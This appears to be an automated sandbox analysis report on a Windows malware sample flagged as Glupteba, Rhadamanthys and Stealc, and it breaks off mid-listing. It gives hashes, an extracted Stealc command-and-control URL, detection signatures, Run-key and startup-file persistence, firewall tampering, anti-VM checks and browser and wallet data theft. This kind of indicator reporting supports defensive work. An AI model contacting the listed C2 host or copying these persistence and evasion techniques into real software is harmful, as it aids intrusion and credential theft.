Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2024 02:19
Static task
static1
Behavioral task
behavioral1
Sample
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
Resource
win7-20240221-en
General
-
Target
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
-
Size
4.1MB
-
MD5
8803d74d52bcda67e9b889bd6cc5823e
-
SHA1
884a1fa1ae3d53bc435d34f912c0068e789a8b25
-
SHA256
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3
-
SHA512
c190ca373875789477a755f6246565bc7cb5744f1d5f62037e71d3595c1023f587f34a2437d9691ad96cde789026b7c2896110935e58cc2f1498cfea5d0d9564
-
SSDEEP
49152:EIWoXiQpx+/9NQXrglcx9LUSf5AKbq7uFIT8AZPvKcNhNpHrlyI:Qo3gMmWoWRbWBvjNhbByI
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Glupteba payload 15 IoCs
Processes:
resource yara_rule behavioral2/memory/3548-73-0x0000000002D50000-0x000000000363B000-memory.dmp family_glupteba behavioral2/memory/3548-74-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3180-76-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3700-91-0x0000000002DB0000-0x000000000369B000-memory.dmp family_glupteba behavioral2/memory/3700-93-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3548-119-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3180-141-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3548-307-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3180-325-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3700-377-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3548-484-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3180-485-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3700-500-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4656-589-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4452-620-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
UeBGJdQZVUuurvvrtFOtjUqE.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" UeBGJdQZVUuurvvrtFOtjUqE.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid Process procid_target PID 1108 created 2600 1108 RegAsm.exe 45 -
Detect binaries embedding considerable number of MFA browser extension IDs. 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3636-414-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs behavioral2/memory/3636-502-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs behavioral2/memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs -
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3636-414-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs behavioral2/memory/3636-502-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs behavioral2/memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs -
Detects Windows executables referencing non-Windows User-Agents 13 IoCs
Processes:
resource yara_rule behavioral2/memory/3548-74-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3180-76-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3700-93-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3548-119-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3180-141-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3548-307-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3180-325-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3700-377-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3548-484-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3180-485-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/3700-500-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/4656-589-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/memory/4452-620-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3636-414-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral2/memory/3636-502-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral2/memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables (downlaoders) containing URLs to raw contents of a paste 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1472-0-0x0000000000400000-0x0000000000408000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawPaste_URL -
Detects executables Discord URL observed in first stage droppers 13 IoCs
Processes:
resource yara_rule behavioral2/memory/3548-74-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3180-76-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3700-93-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3548-119-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3180-141-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3548-307-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3180-325-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3700-377-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3548-484-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3180-485-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/3700-500-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/4656-589-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL behavioral2/memory/4452-620-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_DiscordURL -
Detects executables containing URLs to raw contents of a Github gist 13 IoCs
Processes:
resource yara_rule behavioral2/memory/3548-74-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3180-76-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3700-93-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3548-119-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3180-141-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3548-307-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3180-325-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3700-377-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3548-484-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3180-485-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/3700-500-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/4656-589-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL behavioral2/memory/4452-620-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL -
Detects executables containing artifacts associated with disabling Widnows Defender 13 IoCs
Processes:
resource yara_rule behavioral2/memory/3548-74-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3180-76-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3700-93-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3548-119-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3180-141-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3548-307-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3180-325-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3700-377-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3548-484-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3180-485-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/3700-500-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/4656-589-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender behavioral2/memory/4452-620-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender -
Detects executables packed with Themida 11 IoCs
Processes:
resource yara_rule behavioral2/files/0x000600000002326a-371.dat INDICATOR_EXE_Packed_Themida behavioral2/files/0x000600000002326a-376.dat INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-401-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-406-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-397-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-410-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-411-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-412-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-413-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-505-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/2636-781-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp INDICATOR_EXE_Packed_Themida -
Detects executables referencing many varying, potentially fake Windows User-Agents 13 IoCs
Processes:
resource yara_rule behavioral2/memory/3548-74-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3180-76-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3700-93-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3548-119-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3180-141-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3548-307-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3180-325-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3700-377-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3548-484-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3180-485-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/3700-500-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/4656-589-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA behavioral2/memory/4452-620-0x0000000000400000-0x0000000000D1C000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
UeBGJdQZVUuurvvrtFOtjUqE.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UeBGJdQZVUuurvvrtFOtjUqE.exe -
UPX dump on OEP (original entry point) 4 IoCs
Processes:
resource yara_rule behavioral2/files/0x0009000000023238-177.dat UPX behavioral2/files/0x0009000000023238-172.dat UPX behavioral2/memory/4940-187-0x0000000000400000-0x0000000000930000-memory.dmp UPX behavioral2/memory/4940-448-0x0000000000400000-0x0000000000930000-memory.dmp UPX -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid Process 190 5280 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid Process 5608 netsh.exe 5640 netsh.exe 5220 netsh.exe -
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
UeBGJdQZVUuurvvrtFOtjUqE.exeInstall.exeInstall.exerundll32.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UeBGJdQZVUuurvvrtFOtjUqE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UeBGJdQZVUuurvvrtFOtjUqE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
GJJottccSrZvHDi2rOc2biM9.exeInstall.exeu2dw.0.exeInstall.exeCAFIJKFHIJ.exeKQwfUoo.exe2sK9qcVeMtm0aymJpbObEY9P.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation GJJottccSrZvHDi2rOc2biM9.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation u2dw.0.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation CAFIJKFHIJ.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation KQwfUoo.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation 2sK9qcVeMtm0aymJpbObEY9P.exe -
Drops startup file 11 IoCs
Processes:
installutil.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OGw3iVRtVTorDTvrZWVFIRH3.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SrW2mPdLSg31OAH841w73qcw.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pm05pTLuUdC7FMJ85g9crRy7.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jFDWS62MuE8dcLg86cb2VlF5.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wj1sBVa2SKVzIVUuIxyRFx1k.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ym0cIneygugXMnSzap6duAZS.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GBvKxHnoVQeTRn9daTavP9xw.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ycX4zOch6JksPqX8gcvOQIqE.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAyBqnC6d2btBn1GERznlHjO.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Jj9NBgyCRfcZudsJjLMwpnm.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xecqa4DAy7lCYCKQpjOuHDrT.bat installutil.exe -
Executes dropped EXE 33 IoCs
Processes:
GJJottccSrZvHDi2rOc2biM9.exeO0CPJ0FFbJ7m6QGvaPcCCRWK.exe1W7hBQbCXjFNhD9IQsfTupEb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exeGUfrwuhZbYaOvK64ZU92F4kb.exeu2dw.0.exeu2dw.1.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeyuVVFMVY94h4dq6orGkzD9rD.exeInstall.exeUeBGJdQZVUuurvvrtFOtjUqE.exeInstall.exeGUfrwuhZbYaOvK64ZU92F4kb.exe1W7hBQbCXjFNhD9IQsfTupEb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exeaqscNlEwGraum9ul3o4DymK7.exeInstall.exeInstall.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeCAFIJKFHIJ.execsrss.exe2sK9qcVeMtm0aymJpbObEY9P.exeinjector.exewindefender.exewindefender.exepuXYKqB.exeKQwfUoo.exepid Process 3092 GJJottccSrZvHDi2rOc2biM9.exe 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 3636 u2dw.0.exe 4940 u2dw.1.exe 856 WZ5cX3pyFhvxZFq1AmkufeHv.exe 1904 WZ5cX3pyFhvxZFq1AmkufeHv.exe 2560 WZ5cX3pyFhvxZFq1AmkufeHv.exe 2024 WZ5cX3pyFhvxZFq1AmkufeHv.exe 1108 WZ5cX3pyFhvxZFq1AmkufeHv.exe 212 yuVVFMVY94h4dq6orGkzD9rD.exe 3436 Install.exe 2636 UeBGJdQZVUuurvvrtFOtjUqE.exe 4136 Install.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 5956 aqscNlEwGraum9ul3o4DymK7.exe 5156 Install.exe 1276 Install.exe 5308 Assistant_108.0.5067.20_Setup.exe_sfx.exe 4504 assistant_installer.exe 4620 assistant_installer.exe 4028 CAFIJKFHIJ.exe 6108 csrss.exe 6032 2sK9qcVeMtm0aymJpbObEY9P.exe 5144 injector.exe 5456 windefender.exe 4432 windefender.exe 2452 puXYKqB.exe 6056 KQwfUoo.exe -
Loads dropped DLL 12 IoCs
Processes:
WZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exeu2dw.0.exeassistant_installer.exeassistant_installer.exerundll32.exepid Process 856 WZ5cX3pyFhvxZFq1AmkufeHv.exe 1904 WZ5cX3pyFhvxZFq1AmkufeHv.exe 2560 WZ5cX3pyFhvxZFq1AmkufeHv.exe 2024 WZ5cX3pyFhvxZFq1AmkufeHv.exe 1108 WZ5cX3pyFhvxZFq1AmkufeHv.exe 3636 u2dw.0.exe 3636 u2dw.0.exe 4504 assistant_installer.exe 4504 assistant_installer.exe 4620 assistant_installer.exe 4620 assistant_installer.exe 5280 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/files/0x000600000002326a-371.dat themida behavioral2/files/0x000600000002326a-376.dat themida behavioral2/memory/2636-401-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-406-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-397-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-410-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-411-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-412-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-413-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-505-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida behavioral2/memory/2636-781-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp themida -
Processes:
resource yara_rule behavioral2/files/0x0009000000023238-177.dat upx behavioral2/files/0x0009000000023238-172.dat upx behavioral2/memory/4940-187-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/memory/4940-448-0x0000000000400000-0x0000000000930000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
xS3VUm3AkBIOCvlKG8AJkD7Z.exeGUfrwuhZbYaOvK64ZU92F4kb.exe1W7hBQbCXjFNhD9IQsfTupEb.execsrss.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" GUfrwuhZbYaOvK64ZU92F4kb.exe Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 1W7hBQbCXjFNhD9IQsfTupEb.exe Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
UeBGJdQZVUuurvvrtFOtjUqE.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UeBGJdQZVUuurvvrtFOtjUqE.exe -
Drops Chrome extension 2 IoCs
Processes:
KQwfUoo.exedescription ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json KQwfUoo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json KQwfUoo.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
KQwfUoo.exedescription ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini KQwfUoo.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WZ5cX3pyFhvxZFq1AmkufeHv.exeWZ5cX3pyFhvxZFq1AmkufeHv.exedescription ioc Process File opened (read-only) \??\D: WZ5cX3pyFhvxZFq1AmkufeHv.exe File opened (read-only) \??\F: WZ5cX3pyFhvxZFq1AmkufeHv.exe File opened (read-only) \??\D: WZ5cX3pyFhvxZFq1AmkufeHv.exe File opened (read-only) \??\F: WZ5cX3pyFhvxZFq1AmkufeHv.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 77 api.myip.com 82 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 46 IoCs
Processes:
KQwfUoo.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepuXYKqB.exeUeBGJdQZVUuurvvrtFOtjUqE.exeInstall.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E KQwfUoo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification 